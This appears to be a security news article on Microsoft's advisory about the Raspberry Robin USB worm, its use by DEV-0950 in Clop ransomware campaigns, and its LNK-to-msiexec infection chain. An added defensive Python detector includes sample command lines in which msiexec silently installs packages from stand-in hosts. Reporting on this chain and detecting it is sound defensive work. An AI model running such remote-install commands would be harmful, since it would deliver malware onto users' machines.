Microsoft Security has published a warning to businesses about a new Raspberry Robin USB drive worm. According to the advisory, the worm has affected nearly 1,000 organizations and 3,000 devices over the last month.

It is worth noting that the Raspberry Robin worm is not new. It has already been seen deploying LockBit ransomware, and malware such as Truebot and Bumblebee. In fact, I reported in May how it was being used to attack Windows systems.

Microsoft’s warning suggests the worm is now being leveraged in Clop ransomware attacks.

According to Microsoft Security, it is tracking a group known as DEV-0950 as the perpetrator of the latest attacks.

“DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages,” says the Microsoft Security Threat Intelligence Center (MSTIC).

Raspberry Robin was first found in September 2021 by security research firm Red Canary. It is installed on Windows machines through a USB drive. That drive holds a LNK shortcut file that looks like a regular folder.

Attack Potential

While potentially devastating, for an attack to be successful the victim or attacker must insert the infected USB drive and run it on a Windows machine. That is not likely but by no means impossible, as Microsoft Security says there have been nearly a thousand examples in the last 30 days.

The company points out Windows disables autorun on USB drives by default. However, the company says many businesses simply enable it later.

“Raspberry Robin’s LNK file points to cmd.exe to launch the Windows Installer service msiexec.exe and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices,” MSTIC explains. 
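
For defenders, the chain MSTIC describes (cmd.exe starting msiexec.exe against a remotely hosted package) can be hunted for in process-creation logs. The sketch below is an added example, not code from Microsoft or the advisory; the event field names follow Sysmon Event ID 1, and the sample events and `.example` hosts are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events (field names as in Sysmon Event ID 1).
# Hosts use the reserved .example TLD; no value here comes from the advisory.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://nas.example:8080/pkg"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # local install, benign
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Installers\tool.msi"'},
    {"ParentImage": r"C:\Windows\System32\CMD.EXE",      # mixed case, '-' switches
     "Image": r"C:\Windows\System32\MsiExec.exe",
     "CommandLine": 'mSiExEc -Q -I"hTtP://nas.example:8080/x"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",      # URL, but not msiexec
     "Image": r"C:\Windows\System32\ping.exe",
     "CommandLine": "ping http://nas.example"},
]

# Windows command lines are case-insensitive, so match the scheme that way too.
REMOTE_PACKAGE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def remote_msi_from_cmd(event):
    """Return the remote URL if cmd.exe spawned msiexec.exe with one, else None."""
    if basename(event.get("ParentImage", "")).lower() != "cmd.exe":
        return None
    if basename(event.get("Image", "")).lower() != "msiexec.exe":
        return None
    match = REMOTE_PACKAGE.search(event.get("CommandLine", ""))
    return match.group(0) if match else None


def scan(events):
    """Return (event index, remote URL) for every event matching the chain."""
    hits = []
    for index, event in enumerate(events):
        url = remote_msi_from_cmd(event)
        if url:
            hits.append((index, url))
    return hits


if __name__ == "__main__":
    for index, url in scan(SAMPLE_EVENTS):
        print(f"event {index}: cmd.exe -> msiexec.exe fetching {url}")
```

Legitimate software deployment can also install MSI packages from a URL, so hits are best triaged against known internal distribution hosts.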
